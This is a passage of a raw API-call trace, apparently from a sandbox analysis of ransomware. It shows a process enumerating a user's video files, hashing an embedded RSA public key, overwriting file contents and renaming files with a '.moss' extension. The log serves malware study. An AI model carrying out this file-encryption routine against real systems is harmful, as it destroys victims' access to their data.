dwFlags=0x0) returned 1 [0172.060] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.060] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.060] GetLastError () returned 0x0 [0172.060] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.060] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0172.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.061] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.061] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.061] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.061] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.062] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x14a01, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.062] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0172.062] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\WPBWEhNjk04EMrHCp.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\wpbwehnjk04emrhcp.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\WPBWEhNjk04EMrHCp.mp4.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\wpbwehnjk04emrhcp.mp4.moss")) returned 1 [0172.063] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.063] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.063] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.064] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.064] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e862440, ftCreationTime.dwHighDateTime=0x1d5da3c, ftLastAccessTime.dwLowDateTime=0x1bc33b00, ftLastAccessTime.dwHighDateTime=0x1d5da61, ftLastWriteTime.dwLowDateTime=0x1bc33b00, ftLastWriteTime.dwHighDateTime=0x1d5da61, nFileSizeHigh=0x0, nFileSizeLow=0x14a01, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WPBWEhNjk04EMrHCp.mp4", cAlternateFileName="WPBWEH~1.MP4")) returned 0 [0172.064] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.064] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.064] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ebf0 | out: hHeap=0xcd0000) returned 1 [0172.064] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.064] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.065] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\") returned="V4xTSO7L1q6Ip\\" [0172.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0172.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0172.065] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0172.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b513a0 [0172.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0172.065] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b513a0 | out: hHeap=0xcd0000) returned 1 [0172.065] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.065] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.065] PathFindFileNameW (pszPath="") returned="" [0172.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0172.065] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fa9f050, ftCreationTime.dwHighDateTime=0x1d5e17a, ftLastAccessTime.dwLowDateTime=0xb5cca540, ftLastAccessTime.dwHighDateTime=0x1d5dbbc, ftLastWriteTime.dwLowDateTime=0xb5cca540, ftLastWriteTime.dwHighDateTime=0x1d5dbbc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0172.065] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fa9f050, ftCreationTime.dwHighDateTime=0x1d5e17a, ftLastAccessTime.dwLowDateTime=0xb5cca540, ftLastAccessTime.dwHighDateTime=0x1d5dbbc, ftLastWriteTime.dwLowDateTime=0xb5cca540, ftLastWriteTime.dwHighDateTime=0x1d5dbbc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.066] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8303f910, ftCreationTime.dwHighDateTime=0x1d5e27e, ftLastAccessTime.dwLowDateTime=0x9cb272f0, ftLastAccessTime.dwHighDateTime=0x1d5da5a, ftLastWriteTime.dwLowDateTime=0x9cb272f0, ftLastWriteTime.dwHighDateTime=0x1d5da5a, nFileSizeHigh=0x0, nFileSizeLow=0x360a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9U56ddJ544.mkv", cAlternateFileName="9U56DD~1.MKV")) returned 1 [0172.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0172.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa6) returned 0x35e3280 [0172.066] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0172.066] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\9U56ddJ544.mkv") returned=".mkv" [0172.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\9U56ddJ544.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\9u56ddj544.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.066] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=13834) returned 1 [0172.066] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.069] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x35e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.069] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.070] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.070] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.070] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.070] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x360a, lpOverlapped=0x0) returned 1 [0172.071] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.071] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.071] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.071] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.071] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0172.072] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.072] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.072] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.072] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.072] GetLastError () returned 0x0 [0172.072] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.072] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0172.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.072] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.072] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.072] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x3610) returned 0x3b53ea8 [0172.073] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0172.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b513a0 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e190 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b513e8 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e1a8 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e1d8 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e1f0 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0172.073] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0172.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e1d8 | out: hHeap=0xcd0000) returned 1 [0172.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e1f0 | out: hHeap=0xcd0000) returned 1 [0172.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0172.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e1f0 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4e1d8 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa26a0 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa27b8 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0172.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0172.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e1f0 | out: hHeap=0xcd0000) returned 1 [0172.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0172.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e1d8 | out: hHeap=0xcd0000) returned 1 [0172.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0172.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0172.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0172.074] GetCurrentThreadId () returned 0x324 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b50288 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0172.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.075] GetCurrentThreadId () returned 0x324 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0172.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e1d8 [0172.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0172.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0172.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e1f0 [0172.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0172.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e1c0 [0172.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddd0 [0172.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0172.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0172.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dde8 [0172.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e208 [0172.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dd70 [0172.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dde8 | out: hHeap=0xcd0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0172.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0172.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0172.076] RtlAllocateHeap (HeapHandle=0xcd0000, 